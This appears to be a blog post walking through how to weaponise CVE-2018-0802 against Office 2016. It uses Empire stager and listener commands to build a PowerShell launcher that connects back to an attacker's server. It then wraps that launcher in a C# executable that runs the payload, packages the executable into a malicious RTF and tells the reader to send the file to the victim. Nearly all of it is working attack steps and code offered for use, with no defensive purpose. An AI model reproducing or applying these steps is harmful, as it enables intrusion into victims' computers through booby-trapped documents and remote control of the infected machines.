Exploit Office 2016 using CVE-2018-0802

If you don't have Empire download from here 
Just run ./setup/install.sh to install

Also Download Exploit for CVE-2018-0802 

Create payload 

usestager windows/launcher_bat 
set Listener http
execute

cat /tmp/launcher.bat

copy powershell script

open visual studio

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;

namespace shell
{
    class Program
    {
        static void Main(string[] args)
        {
            string strCmdText;
            strCmdText = "your-powershell-here";
            System.Diagnostics.Process.Start("powershell.exe", strCmdText);
        }
    }
}

paste & Build save it shell.exe

Now go to CVE-2018-0802 folder 
run 

packager_exec_CVE-2018-0802.py -e shell.exe -o word.rtf

send it to the victim 



No comments:

Post a Comment

Popular Posts